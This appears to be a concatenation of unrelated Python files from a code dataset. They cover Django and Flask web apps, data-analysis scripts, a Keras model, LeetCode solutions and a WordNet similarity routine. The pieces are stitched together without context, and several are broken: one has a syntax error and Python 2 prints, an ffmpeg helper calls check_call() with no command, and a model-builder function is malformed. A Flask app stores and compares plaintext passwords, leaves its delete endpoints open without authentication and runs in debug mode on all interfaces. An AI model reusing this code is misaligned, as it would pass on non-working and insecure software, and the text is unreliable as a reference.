""" set the machine state to pause """
self._paused = True
def reset_pause(self):
""" un-pause the state of the machine """
self._paused = False
|
from reverse_dict.methods import (Method01Py2, Method01Py3, Method02Py2,
Method02Py3, Method03Py2, Method03Py3)
from reverse_dict.config import cfg
class Argument(object):
def __init__(self, option_name, short_option, long_option, **kwargs):
self.args = None
self.kwargs = {}
self.option_name = option_name
self.short_option = short_option
self.long_option = long_option
# IMPORTANT: when an argument's option name is used instead of the
# argument's short and long options, the short and long options are
# ignored
if option_name:
self.args = option_name
else:
self.args = [opt for opt in [short_option, long_option] if opt]
if kwargs:
self.kwargs.update(kwargs)
class MethodNameArgument(Argument):
__argument_name__ = 'method_name'
__common_option__ = False
__default_value__ = Method01Py3.__method_name__
__help_arg__ = '''\
Name of the method that reverses a dict's keys and values:
{}: makes use of dict comprehension, and the dict must contain
unique values. Works on Python 2.7
{}: the reversed dict stores as values a list of all the keys
associated with the same value in the original dict,
and the dict doesn't contain unique values. Works on
Python 2.7
{}: makes use of map(reversed, iter), and the type and order of the
original dict are preserved (if for example it is an
OrderedDict). Works on Python 2.7
{}: Python 3 version of {}
{}: Python 3 version of {}
{}: Python 3 version of {}
(default: {})
'''.format(Method01Py2.__method_name__, Method02Py2.__method_name__,
Method03Py2.__method_name__, Method01Py3.__method_name__,
Method01Py2.__method_name__, Method02Py3.__method_name__,
Method02Py2.__method_name__, Method03Py3.__method_name__,
Method03Py2.__method_name__, __default_value__)
def __init__(self, option_name=None, short_option='-m',
long_option='--{}'.format(__argument_name__),
default=__default_value__, help=__help_arg__, **kwargs):
super(MethodNameArgument, self).__init__(
option_name, short_option, long_option, default=default, help=help,
**kwargs)
class NumberItemsArgument(Argument):
__argument_name__ = 'number_items'
__common_option__ = True
__default_value__ = 1000
__help_arg__ = 'Number of items in the dictionary. ' \
'(default: {})'.format(__default_value__)
def __init__(self, option_name=None, short_option='-ni',
long_option='--{}'.format(__argument_name__),
default=__default_value__, type=int, help=__help_arg__, **kwargs):
super(NumberItemsArgument, self).__init__(
option_name, short_option, long_option, default=default, type=type,
help=help, **kwargs)
class NumberTimesArgument(Argument):
__argument_name__ = 'number_times'
__common_option__ = True
__default_value__ = 10
__help_arg__ = '''Number of times the dictionary's keys and values will be reversed.
Each time, the run time of the reversal is computed and at the end
of all the tries, the average run time is computed. (default: {})
'''.format(__default_value__)
def __init__(self, option_name=None, short_option='-nt',
long_option='--{}'.format(__argument_name__),
default=__default_value__, type=int, help=__help_arg__, **kwargs):
super(NumberTimesArgument, self).__init__(
option_name, short_option, long_option, default=default, type=type,
help=help, **kwargs)
class PrecisionArgument(Argument):
__argument_name__ = 'precision'
__common_option__ = True
__default_value__ = 8
__help_arg__ = 'Decimal precision used when displaying the results. ' \
'(default: {})'.format(__default_value__)
def __init__(self, option_name=None, short_option='-p', type=int,
long_option='--{}'.format(__argument_name__),
default=__default_value__, help=__help_arg__, **kwargs):
super(PrecisionArgument, self).__init__(
option_name, short_option, long_option, default=default, type=type,
help=help, **kwargs)
class PrintDictsArgument(Argument):
__argument_name__ = 'print_dicts'
__common_option__ = True
__default_value__ = False
__help_arg__ = 'Print the original and reversed dictionaries at the end. ' \
'(default: {})'.format(__default_value__)
def __init__(self, option_name=None, short_option='-pd',
long_option='--{}'.format(__argument_name__), action='store_true',
help=__help_arg__, **kwargs):
super(PrintDictsArgument, self).__init__(
option_name, short_option, long_option, action=action, help=help,
**kwargs)
class UseItemsArgument(Argument):
__argument_name__ = 'use_items'
__common_option__ = False
__default_value__ = False
__help_arg__ = '''When working on Python 2, use dict.items() instead of the more efficient
dict.iteritems() (default: {}.)'''.format(__default_value__)
def __init__(self, option_name=None, short_option='-ui',
long_option='--{}'.format(__argument_name__), action='store_true',
help=__help_arg__, **kwargs):
super(UseItemsArgument, self).__init__(
option_name, short_option, long_option, action=action, help=help,
**kwargs)
class UseNonUniquesArgument(Argument):
__argument_name__ = 'use_non_uniques'
__common_option__ = True
__default_value__ = False
__help_arg__ = 'Initialize the original dictionary with non-unique values. ' \
'(default: {})'.format(__default_value__)
def __init__(self, option_name=None, short_option='-unu',
long_option='--{}'.format(__argument_name__), action='store_true',
help=__help_arg__, **kwargs):
super(UseNonUniquesArgument, self).__init__(
option_name, short_option, long_option, action=action, help=help,
**kwargs)
class UseOrderedDictArgument(Argument):
__argument_name__ = 'use_ordered_dict'
__common_option__ = True
__default_value__ = False
__help_arg__ = '''Use OrderedDict instead of dict for both dictionaries (original and inverse)
(default: {}).'''.format(__default_value__)
def __init__(self, option_name=None, short_option='-uod',
long_option='--{}'.format(__argument_name__), action='store_true',
help=__help_arg__, **kwargs):
super(UseOrderedDictArgument, self).__init__(
option_name, short_option, long_option, action=action, help=help,
**kwargs)
class UseSetDefaultArgument(Argument):
__argument_name__ = 'use_setdefault'
__common_option__ = False
__default_value__ = False
__help_arg__ = '''Use dict.setdefault() instead of dict.get() when populating the dictionary.
(default: {})'''.format(__default_value__)
def __init__(self, option_name=None, short_option='-usd',
long_option='--{}'.format(__argument_name__), action='store_true',
help=__help_arg__, **kwargs):
super(UseSetDefaultArgument, self).__init__(
option_name, short_option, long_option, action=action, help=help,
**kwargs)
class VersionArgument(Argument):
__argument_name__ = 'version'
__common_option__ = True
__help_arg__ = "Show program's version and exit."
def __init__(self, option_name=None, short_option='-v',
long_option='--{}'.format(__argument_name__), action='version',
version='%(prog)s {}'.format(cfg.version), help=__help_arg__,
**kwargs):
super(VersionArgument, self).__init__(
option_name, short_option, long_option, action=action,
version=version, help=help, **kwargs)
# TODO: specify what it is meant by common. Options that are common to both Python 3
# and Python 2 methods
# TODO: add also a get_all_arguments() function to be used in the main script
def get_common_arguments():
# TODO: make use of `__common_option__` to know which argument to add to the list
return [NumberItemsArgument(), NumberTimesArgument(), PrecisionArgument(),
PrintDictsArgument(), UseNonUniquesArgument(), UseOrderedDictArgument(),
UseSetDefaultArgument(), VersionArgument()]
|
# Week 2
# Question 1
def text_handle(n):
return " ".join(n.split())
sample_text = "Hello my friend"
print(text_handle(sample_text))
# Time complexity: o(1)
# Space complexity: o(1)
|
#!/usr/bin/env python3
"""
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Audiophiles Music Manager Build 20180119 VER0.0.0PREALPHA *
* (C)2017 Mattijs Snepvangers pegasus.ict@gmail.com *
* test.py Package Tester VER0.0.0PREALPHA *
* License: MIT Please keep my name in the credits *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
"""
### Defining variables...
ui_style = "dialog"
ui_language = "en"
AMM_TITLE = "Audiophiles Music Manager"
# my_ui = None
# amm_config = dict()
# db_handle = None
# import sys
# import time
# # # load my own code
# import lib.fsops as fsops
# import lib.conf as conf
import lib.ui as ui
# import lib.debugger
# import lib.db_agent as dba
# import lib.afops as afops
# import lib.inetc as inetc
# import lib.daemonizer as daemonizer
# import lib.reportbuilder as reportbuilder
def inclusive_range(*args):
# generator function
numargs = len(args)
if numargs < 1: raise TypeError('Requires at least one argument')
if numargs == 1:
stop = args[0]
start = 0
step = 1
elif numargs == 2:
(start, stop) = args
step = 1
elif numargs == 3:
(start, stop, step) = args
else:
raise TypeError('inclusive_range expected at most 3 arguments, got {}.'.format(numargs)
i = start
while i <= stop:
yield i # pass on value and continue with loop
i += step
def main():
print("testing...")
my_ui = lib.ui.UserInterface('dialog')
kwargs['message'] = "hello"
kwargs['title'] = "test title"
try:
result = my_ui.announce(**kwargs)
except Exception, e:
print str(e)
# standard boilerplate
if __name__ == '__main__':
main()
|
from django.shortcuts import render
from django.core import serializers
from rest_framework import status, viewsets, views
from .models import Category, Product, Order, Highlight, HighlightBig
from rest_framework.response import Response
from rest_framework.decorators import api_view
from .serializers import CategorySerializer, ProductSerializer , OrderSerializer, HighlightSerializer
from rest_framework.parsers import JSONParser
from rest_framework import generics, permissions, mixins, viewsets
from django.db.models import Count, Sum
from django.core.paginator import Paginator
from rest_framework.pagination import PageNumberPagination
class CategoryViewSet(generics.GenericAPIView, mixins.ListModelMixin,):
queryset = Category.objects.all()
serializer_class = CategorySerializer
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class OrderViewSet(generics.GenericAPIView, mixins.ListModelMixin, mixins.CreateModelMixin,):
permission_classes = [
permissions.IsAuthenticated,
]
queryset = Order.objects.all()
serializer_class = OrderSerializer
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class ProductViewSet(generics.GenericAPIView,
mixins.ListModelMixin,
mixins.CreateModelMixin,
):
# permission_classes = [
# permissions.IsAuthenticated,
# ]
queryset = Product.objects.all()
serializer_class = ProductSerializer
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class HighlightViewSet(generics.GenericAPIView,
mixins.ListModelMixin,
mixins.CreateModelMixin,
):
queryset = Highlight.objects.all()
serializer_class = HighlightSerializer
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class ProductDetailViewSet(generics.RetrieveUpdateDestroyAPIView):
queryset = Product.objects.all()
serializer_class = ProductSerializer
|
import openpyxl
import numpy as np
import math
import matplotlib.pyplot as plt
from numpy.linalg import inv
alarmdata=openpyxl.load_workbook('C:\\Users\\aviza\\Desktop\\CSE 674\\Project 1\\alarm10K.xlsx')
aladata=alarmdata.get_sheet_by_name('alarm10K')
individualp=[]
def find_pdf(a,b):
facts=1
probs=1
for i in range(len(a)):
facts*=math.factorial(int(b[i]))
probs*=math.pow(a[i],int(b[i]))
pd=math.factorial(100)*probs/(facts)
return pd/10000
def find_info(x,y):
fx=[]
fy=[]
for i in range(2,10001,1):
fx.append(aladata.cell(row=i,column=x).value)
fy.append(aladata.cell(row=i,column=y).value)
x1=list(set(fx))
y1=list(set(fy))
info=0
for q in x1:
for r in y1:
s=0
for j in range(2,10001,1):
if aladata.cell(row=j,column=x).value == q and aladata.cell(row=j,column=y).value == r:
s+=1
s=s/10000
p1=find_count(fx,q)
p2=find_count(fy,r)
#try:
info+=s*math.log( (s/(p1*p2)) +1 )
#except:
#pass
return info
def find_count(li,v):
sq=0.0
for i in range(len(li)):
if li[i]==v:
sq+=1
return sq/len(li)
for k in range(1,38,1):
l=[]
for i in range(2,10001,1):
l.append(aladata.cell(row=i,column=k).value)
probab=list(set(l))
s=[]
outcomes=[]
for p in probab:
sum1=0
for l1 in l:
if l1==p:
sum1+=1
outcomes.append(sum1/100.0)
s.append(sum1/10000.0)
individualp.append(find_pdf(s,outcomes))
mat= np.zeros((37,37))
rel_mat = np.zeros((37,37))
count =0;
for mi in range(1,38,1):
for mj in range(1,38,1):
if mi==mj:
mat[mi-1][mj-1]=1
if mi<mj:
mat[mi-1][mj-1]=find_info(mi,mj)
if ( mat[mi-1][mj-1] > 0.7):
rel_mat[mi-1][mj-1] = 1
count = count + 1
print(mat)
print (rel_mat)
print (count) |
from django.core.management.base import BaseCommand, CommandError
from app.models import User
class Command(BaseCommand):
help = 'Create test data: users'
def handle(self, *args, **options):
print('Start!')
# clear all users
User.objects.all().delete()
# Insert new users
User.objects.create(
first_name='James',
last_name='Karter',
email='james.karter@gmail.com',
status=1,
)
User.objects.create(
first_name='Mike',
last_name='Hitch',
email='mike.hith@gmail.com',
status=5,
)
User.objects.create(
first_name='Kate',
last_name='Monson',
email='kate@gmail.com',
status=9,
)
User.objects.create(
first_name='Alex',
last_name='Midlton',
email='alex.com',
status=5,
)
count = User.objects.all().count()
print(f'Success! Inserted records: {count}')
|
import flask
import os
import pymongo
import datetime
from flask import Response, jsonify, render_template, request, json, Flask, session, redirect
from flask_bootstrap import Bootstrap
from flask.ext.session import Session
from bson import BSON, json_util, Binary, Code
from bson.objectid import ObjectId
from bson.errors import InvalidId
from bson.json_util import dumps, loads
from user_controller import UserController
from log_controller import LogController
app = flask.Flask(__name__, static_url_path='/static')
SESSION_TYPE = 'mongodb'
SESSION_MONGODB_DB = 'test_db'
app.config.from_object(__name__)
Session(app)
Bootstrap(app)
def cursor_to_list(cursor):
out = []
for asd in cursor:
out.extend(asd)
return out
def response(success, data):
out = {}
out['success'] = success
out['data'] = data
return Response(json.dumps(out), mimetype='application/json')
def List(data):
data = list(data)
for i in data:
if "_id" in i:
i["_id"] = str(i["_id"])
return data
def GetRole():
return session.get("role", 'not set')
@app.after_request
def add_header(r):
"""
Add headers to both force latest IE rendering engine or Chrome Frame,
and also to cache the rendered page for 10 minutes.
"""
r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
r.headers["Pragma"] = "no-cache"
r.headers["Expires"] = "0"
r.headers['Cache-Control'] = 'public, max-age=0'
return r
@app.route('/')
def get_page():
print(session)
role = GetRole()
if role == "user":
print("User")
return redirect("/view-logs")
elif role == "admin":
print("Admin")
return redirect("/admin")
else:
print("Not set")
return app.send_static_file('index.html')
@app.route('/logout')
def logout():
if "role" in session:
del session["role"]
return redirect("/")
@app.route('/view-logs')
def get_logs():
if GetRole() == "user":
return app.send_static_file('user.html')
else:
return redirect("/")
@app.route('/admin')
def admin():
if GetRole() == "admin":
return app.send_static_file('admin.html')
else:
return redirect("/")
@app.route('/users/all', methods=['GET'])
def get_all_user():
user_controller = UserController()
user_dict = user_controller.get_users()
user_json = List(user_dict)
print(user_dict)
return response(True, user_json)
@app.route('/users', methods=['POST'])
def post_user():
user_controller = UserController()
user_controller.insert_user(flask.request.json)
return "OK"
@app.route('/users', methods=['GET'])
def get_user():
if GetRole() == "admin":
user_controller = UserController()
username = request.args.get('username')
user_dict = user_controller.get_user(username)
user_json = json.dumps(user_dict)
return user_json
else:
return json.dumps({"msg": "Permission denied"}), 401
@app.route('/users', methods=['DELETE'])
def delete_user():
user_controller = UserController()
username = flask.request.json['username']
user_controller.delete_user(username)
return "OK"
@app.route('/logs', methods=['POST'])
def post_log():
log_controller = LogController()
log_controller.insert_log(flask.request.json)
return "OK"
@app.route('/register', methods=['POST'])
def register():
flask.request.json["date"] = datetime.datetime.now()
print(flask.request.json)
user_controller = UserController()
if user_controller.get_user(flask.request.json['username']) is None:
user_controller.insert_user(flask.request.json)
return "OK"
else:
return json.dumps({"msg": "User is already registered"}), 401
@app.route('/login', methods=['POST'])
def login():
user_controller = UserController()
username_password_dict = flask.request.json
username_from_req = username_password_dict['username']
user_from_db = user_controller.get_user(username_from_req)
username = user_from_db['username']
password = user_from_db['password']
if username != username_password_dict['username'] or password != username_password_dict['password']:
return json.dumps({"msg": "Bad username or password"}), 401
session["role"] = user_from_db["role"]
return json.dumps({"msg": "Success"}), 200
@app.route('/logs', methods=['GET'])
def get_log():
if GetRole() == "user" or GetRole() == "admin":
log_controller = LogController()
log_dict = log_controller.get_log()
log_json = List(log_dict)
return response(True, log_json)
else:
return json.dumps({"msg": "Permission denied"}), 401
@app.route('/logs', methods=['DELETE'])
def delete_log():
log_controller = LogController()
_id = flask.request.json["_id"]
log_controller.delete_log(_id)
return "OK"
@app.route('/hello')
def hello2():
return "hello"
if __name__ == "__main__":
app.run('0.0.0.0', debug=True)
|
from loraModes import rak811P2P
import utime
raks = rak811P2P(1, 115200, freq=868000000, spreading=7, preamble=6, debug=True)
res = raks.start()
if res == "OK":
print(raks.getStatus())
for count in range(100):
utime.sleep_ms(500)
msg = "Effevee" + str(count)
raks.send(msg)
raks.stop() |
import unittest
import lab6_LoginPageUnitTest
import Lab7_CountOfWebElements
# two test cases are run together
class Test_Suite(unittest.TestCase):
def test_main(self):
self.suite = unittest.TestSuite()
self.suite.addTests([unittest.TestLoader().loadTestsFromModule(lab6_LoginPageUnitTest),
unittest.TestLoader().loadTestsFromModule(Lab7_CountOfWebElements)])
runner = unittest.TextTestRunner()
runner.run(self.suite)
if __name__ == "__main__":
unittest.main() |
import json
import os
import shutil
import math
import pandas as pd
import cv2
import glob
import numpy as np
import subprocess
real_path = os.path.join(os.path.curdir, 'REAL(1500)\\REAL_SENTENCE_morpheme')
syn_path = os.path.join(os.path.curdir, 'SYN(1500)\\SYN_SENTENCE_morpheme')
video = {}
video_data = {}
def shutil_video(v, s, e):
mp4_s = 'ffmpeg - i input.mp4 - ss 00: 00:10 - to 00: 00:20 - c copy output.mp4'
subprocess.check_call()
# ffmpeg - i input.mp4 - ss 00: 00:10 - to 00: 00:20 - c copy output.mp4
def files_in_dir(target):
arr = []
files = os.listdir(target)
for item in files:
arr.append(os.path.join(target, item))
return arr
def normalization(array):
scale_array = array.copy()
scale_array[::2] /= 2048
scale_array[1::2] /= 1152
return scale_array
if __name__ == '__main__':
# Video to name labeling
real_data = files_in_dir(real_path)
syn_data = files_in_dir(syn_path)
for data in real_data:
with open(data, 'r', encoding='UTF-8') as f:
data = f.read()
jdata = json.loads(data)
video[jdata['metaData']['name']] = jdata['data'][0]['attributes'][0]['name']
# Video to data labeling
for mp4 in video:
if 'SEN' in mp4:
openposed_data = files_in_dir(os.path.join(os.path.curdir, 'REAL(1500)\\REAL_SENTENCE_keypoints', mp4[:mp4.rfind('.')]))
face_keypoints_2d_temp = []
pose_keypoints_2d_temp = []
hand_left_keypoints_2d_temp = []
hand_right_keypoints_2d_temp = []
face_keypoints_3d_temp = []
pose_keypoints_3d_temp = []
hand_left_keypoints_3d_temp = []
hand_right_keypoints_3d_temp = []
for keypoints in openposed_data:
with open(keypoints, 'r') as f:
data = f.read()
data = json.loads(data)
face_keypoints_2d_temp.append(data['people']['face_keypoints_2d'])
# pose_keypoints_2d_temp.append(data['people']['pose_keypoints_2d'])
# hand_left_keypoints_2d_temp.append(data['people']['hand_left_keypoints_2d'])
# hand_right_keypoints_2d_temp.append(data['people']['hand_right_keypoints_2d'])
# face_keypoints_3d_temp.append(data['people']['face_keypoints_3d'])
# pose_keypoints_3d_temp.append(data['people']['pose_keypoints_3d'])
# hand_left_keypoints_3d_temp.append(data['people']['hand_left_keypoints_3d'])
# hand_right_keypoints_3d_temp.append(data['people']['hand_right_keypoints_3d'])
video_data[mp4] = [face_keypoints_2d_temp, pose_keypoints_2d_temp, hand_left_keypoints_2d_temp, hand_right_keypoints_2d_temp, face_keypoints_3d_temp, pose_keypoints_3d_temp, hand_left_keypoints_3d_temp, hand_right_keypoints_3d_temp]
print(video_data)
print(video_data[mp4][0])
exit(1)
# with open('test.txt', 'w') as f:
# json.dump(video_data, f)
# exit(1)
|
# [Classic]
# https://leetcode.com/problems/max-value-of-equation/
# 1499. Max Value of Equation
# History:
# Google
# 1.
# Aug 1, 2020
# Given an array points containing the coordinates of points on a 2D plane, sorted by the
# x-values, where points[i] = [xi, yi] such that xi < xj for all 1 <= i < j <= points.length. You
# are also given an integer k.
#
# Find the maximum value of the equation yi + yj + |xi - xj| where |xi - xj| <= k and 1 <= i < j
# <= points.length. It is guaranteed that there exists at least one pair of points that satisfy
# the constraint |xi - xj| <= k.
#
#
#
# Example 1:
#
# Input: points = [[1,3],[2,0],[5,10],[6,-10]], k = 1
# Output: 4
# Explanation: The first two points satisfy the condition |xi - xj| <= 1 and if we calculate the
# equation we get 3 + 0 + |1 - 2| = 4. Third and fourth points also satisfy the condition and
# give a value of 10 + -10 + |5 - 6| = 1.
# No other pairs satisfy the condition, so we return the max of 4 and 1.
# Example 2:
#
# Input: points = [[0,0],[3,0],[9,2]], k = 3
# Output: 3
# Explanation: Only the first two points have an absolute difference of 3 or less in the
# x-values, and give the value of 0 + 0 + |0 - 3| = 3.
#
#
# Constraints:
#
# 2 <= points.length <= 10^5
# points[i].length == 2
# -10^8 <= points[i][0], points[i][1] <= 10^8
# 0 <= k <= 2 * 10^8
# points[i][0] < points[j][0] for all 1 <= i < j <= points.length
# xi form a strictly increasing sequence.
from collections import deque
class SolutionDeque(object):
def findMaxValueOfEquation(self, points, k):
"""
:type points: List[List[int]]
:type k: int
:rtype: int
"""
# yi + yj + |xi - xj| = yi + yj - xi + xj = (yi - xi) + (xj + yj)
deq = deque()
ret = float('-inf')
for x, y in points:
while deq and x - deq[0][1] > k:
deq.popleft()
if deq:
ret = max(ret, deq[0][0] + x + y)
while deq and deq[-1][0] < y - x:
deq.pop()
deq.append((y - x, x))
return ret
from heapq import heappop, heappush
# Time O(NlogN)
# Space O(N)
class SolutionPrirotyQueue(object):
def findMaxValueOfEquation(self, points, k):
"""
:type points: List[List[int]]
:type k: int
:rtype: int
"""
# yi + yj + |xi - xj| = yi + yj - xi + xj = (yi - xi) + (xj + yj)
hp = []
ret = float('-inf')
for x, y in points:
while hp and x - hp[0][1] > k:
heappop(hp)
if hp:
ret = max(ret, -hp[0][0] + x + y)
heappush(hp, (x - y, x))
return ret
|
"""All global variables and triggers are grouped here"""
from data_containers.special_cases import SituationalData
from data_containers.our_possessions import OurPossessionsData
from data_containers.ungrouped_data import OtherData
class MainDataContainer(SituationalData, OurPossessionsData, OtherData):
"""This is the main data container for all data the bot requires"""
def __init__(self):
SituationalData.__init__(self)
OurPossessionsData.__init__(self)
OtherData.__init__(self)
self.close_enemy_production = self.floated_buildings_bm = None
def enemy_special_cases(self):
"""Pretty much makes SituationalData be updated all iterations"""
self.prepare_enemy_data()
self.close_enemy_production = self.check_for_proxy_buildings()
self.floated_buildings_bm = self.check_for_floated_buildings()
def prepare_data(self):
"""Prepares the data every iteration"""
self.counter_attack_vs_flying = self.close_enemies_to_base = False
self.initialize_our_stuff()
self.initialize_enemies()
self.prepare_bases_data()
self.enemy_special_cases()
|
import numpy as np
import keras
from keras.models import Model, load_model
from keras.layers import Dense, Input, Concatenate, Dropout, Add, Lambda, BatchNormalization
from keras import regularizers
from keras import backend as K
from keras.engine.topology import Layer
def load_model(location=None):
if(location != None):
model = keras.models.load_model(location)
print("Loaded the model.")
return model
COVAREP = Input(shape = (95,))
formant = Input(shape = (30,))
text = Input(shape = (80,))
action_units = Input(shape = (35,))
eye_gaze = Input(shape = (25,))
facial_landmarks = Input(shape = (85,))
head_pose = Input(shape = (15,))
#X_gender = Input(shape = (2,))
common_dim = 60
COVAREP_dim_adjusted = Dense(common_dim, activation = 'relu')(COVAREP)
#COVAREP_dim_adjusted = BatchNormalization(center = False, scale = False)(COVAREP_dim_adjusted)
formant_dim_adjusted = Dense(common_dim, activation = 'relu')(formant)
#formant_dim_adjusted = BatchNormalization(center = False, scale = False)(formant_dim_adjusted)
text_dim_adjusted = Dense(common_dim, activation = 'relu')(text)
#text_dim_adjusted = BatchNormalization(center = False, scale = False)(text_dim_adjusted)
action_units_dim_adjusted = Dense(common_dim, activation = 'relu')(action_units)
#action_units_dim_adjusted = BatchNormalization(center = False, scale = False)(action_units_dim_adjusted)
eye_gaze_dim_adjusted = Dense(common_dim, activation = 'relu')(eye_gaze)
#eye_gaze_dim_adjusted = BatchNormalization(center = False, scale = False)(eye_gaze_dim_adjusted)
facial_landmarks_dim_adjusted = Dense(common_dim, activation = 'relu')(facial_landmarks)
#facial_landmarks_dim_adjusted = BatchNormalization(center = False, scale = False)(facial_landmarks_dim_adjusted)
head_pose_dim_adjusted = Dense(common_dim, activation = 'relu')(head_pose)
#head_pose_dim_adjusted = BatchNormalization(center = False, scale = False)(head_pose_dim_adjusted)
P = Concatenate(axis = 1)([COVAREP_dim_adjusted, formant_dim_adjusted, text_dim_adjusted, action_units_dim_adjusted, eye_gaze_dim_adjusted, facial_landmarks_dim_adjusted, head_pose_dim_adjusted])
P = Dense(250, activation = 'tanh')(P)
alpha = Dense(7, activation = 'softmax')(P)
F = Lambda(lambda x : alpha[:,0:1]*COVAREP_dim_adjusted + alpha[:,1:2]*formant_dim_adjusted + alpha[:,2:3]*text_dim_adjusted + alpha[:,3:4]*action_units_dim_adjusted + alpha[:,4:5]*facial_landmarks_dim_adjusted + alpha[:,5:6]*head_pose_dim_adjusted)(alpha)
#Y = Concatenate(axis = -1)([F, X_gender])
Y = Dense(53, activation = 'relu')(F)
Y = Dropout(rate = 0.25)(Y)
#Y = Dense(105, activation = 'relu')(Y)
#Y = Dropout(rate = 0.2)(Y)
Y_dep = Dense(1, activation = None, name = 'DLR')(Y)
Y_gender = Dense(2, activation = 'softmax', name = 'GP')(Y)
model = Model(inputs = [COVAREP, formant, text, action_units, eye_gaze, facial_landmarks, head_pose], outputs = [Y_dep, Y_gender])
print("Created a new model.")
return model
if(__name__ == "__main__"):
m = load_model() |
# coding=utf-8
import copy
"""
581. Shortest Unsorted Continuous Subarray
"""
class Solution(object):
def findUnsortedSubarray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if not nums:
return 0
n = len(nums)
if n == 1:
return 0
nums_copy = copy.copy(nums)
nums_copy.sort()
begin = 0
end = n - 1
while begin <= end:
if nums[begin] == nums_copy[begin]:
begin += 1
else:
break
while begin <= end:
if nums[end] == nums_copy[end]:
end -= 1
else:
break
return end-begin+1
def findUnsortedSubarray1(self, nums):
# 详细解释参考
# https://leetcode.com/problems/shortest-unsorted-continuous-subarray/discuss/103066/Ideas-behind-the-O(n)-two-pass-and-one-pass-solutions
if not nums:
return 0
begin = 0
end = len(nums) - 1
while begin < end and nums[begin] <= nums[begin+1]:
begin += 1
if begin == end:
return 0
while nums[end] >= nums[end-1]:
end -= 1
max_num = float('-inf')
min_num = float('inf')
for k in range(begin, end+1):
max_num = max(max_num, nums[k])
min_num = min(min_num, nums[k])
while begin >= 0 and nums[begin] > min_num:
begin -= 1
while end < len(nums) and nums[end] < max_num:
end += 1
return end - begin - 1
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 6 21:31:21 2018
@author: shivangi
"""
from __future__ import division
from nltk.corpus import wordnet as wn
import math
import sys
# Parameters to the algorithm. Currently set to values that was reported
# in the paper to produce "best" results.
ALPHA = 0.2
BETA = 0.45
######################### word similarity ##########################
def get_best_synset_pair(word_1, word_2):
"""
Choose the pair with highest path similarity among all pairs.
Mimics pattern-seeking behavior of humans.
"""
max_sim = -1.0
synsets_1 = wn.synsets(word_1)
synsets_2 = wn.synsets(word_2)
if len(synsets_1) == 0 or len(synsets_2) == 0:
return None, None
else:
max_sim = -1.0
best_pair = None, None
for synset_1 in synsets_1:
for synset_2 in synsets_2:
sim = wn.path_similarity(synset_1, synset_2)
try:
if sim > max_sim:
max_sim = sim
best_pair = synset_1, synset_2
except:
continue
return best_pair
def length_dist(synset_1, synset_2):
"""
Return a measure of the length of the shortest path in the semantic
ontology (Wordnet in our case as well as the paper's) between two
synsets.
"""
l_dist = sys.maxsize
if synset_1 is None or synset_2 is None:
return 0.0
if synset_1 == synset_2:
# if synset_1 and synset_2 are the same synset return 0
l_dist = 0.0
else:
wset_1 = set([str(x.name()) for x in synset_1.lemmas()])
wset_2 = set([str(x.name()) for x in synset_2.lemmas()])
if len(wset_1.intersection(wset_2)) > 0:
# if synset_1 != synset_2 but there is word overlap, return 1.0
l_dist = 1.0
else:
# just compute the shortest path between the two
l_dist = synset_1.shortest_path_distance(synset_2)
if l_dist is None:
l_dist = 0.0
# normalize path length to the range [0,1]
return math.exp(-ALPHA * l_dist)
def hierarchy_dist(synset_1, synset_2):
"""
Return a measure of depth in the ontology to model the fact that
nodes closer to the root are broader and have less semantic similarity
than nodes further away from the root.
"""
h_dist = sys.maxsize
if synset_1 is None or synset_2 is None:
return h_dist
if synset_1 == synset_2:
# return the depth of one of synset_1 or synset_2
h_dist = max([x[1] for x in synset_1.hypernym_distances()])
else:
# find the max depth of least common subsumer
hypernyms_1 = {x[0]:x[1] for x in synset_1.hypernym_distances()}
hypernyms_2 = {x[0]:x[1] for x in synset_2.hypernym_distances()}
lcs_candidates = set(hypernyms_1.keys()).intersection(
set(hypernyms_2.keys()))
if len(lcs_candidates) > 0:
lcs_dists = []
for lcs_candidate in lcs_candidates:
lcs_d1 = 0
if lcs_candidate in hypernyms_1:
lcs_d1 = hypernyms_1[lcs_candidate]
lcs_d2 = 0
if lcs_candidate in hypernyms_2:
lcs_d2 = hypernyms_2[lcs_candidate]
lcs_dists.append(max([lcs_d1, lcs_d2]))
h_dist = max(lcs_dists)
else:
h_dist = 0
return ((math.exp(BETA * h_dist) - math.exp(-BETA * h_dist)) /
(math.exp(BETA * h_dist) + math.exp(-BETA * h_dist)))
def word_similarity(word_1, word_2):
synset_pair = get_best_synset_pair(word_1, word_2)
return (length_dist(synset_pair[0], synset_pair[1]) *
hierarchy_dist(synset_pair[0], synset_pair[1]))
######################### main / test ##########################
# the results of the algorithm are largely dependent on the results of
# the word similarities, so we should test this first...
word_pairs = [
["asylum", "fruit", 0.21],
["autograph", "shore", 0.29],
["autograph", "signature", 0.55],
["automobile", "car", 0.64],
["bird", "woodland", 0.33],
["boy", "rooster", 0.53],
["boy", "lad", 0.66],
["boy", "sage", 0.51],
["cemetery", "graveyard", 0.73],
["coast", "forest", 0.36],
["coast", "shore", 0.76],
["cock", "rooster", 1.00],
["cord", "smile", 0.33],
["cord", "string", 0.68],
["cushion", "pillow", 0.66],
["forest", "graveyard", 0.55],
["forest", "woodland", 0.70],
["furnace", "stove", 0.72],
["glass", "tumbler", 0.65],
["grin", "smile", 0.49],
["gem", "jewel", 0.83],
["hill", "woodland", 0.59],
["hill", "mound", 0.74],
["implement", "tool", 0.75],
["journey", "voyage", 0.52],
["magician", "oracle", 0.44],
["magician", "wizard", 0.65],
["midday", "noon", 1.0],
["oracle", "sage", 0.43],
["serf", "slave", 0.39]
]
for word_pair in word_pairs:
print("%s\t%s\t%.2f\t%.2f" % (word_pair[0], word_pair[1], word_pair[2],
word_similarity(word_pair[0], word_pair[1]))) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.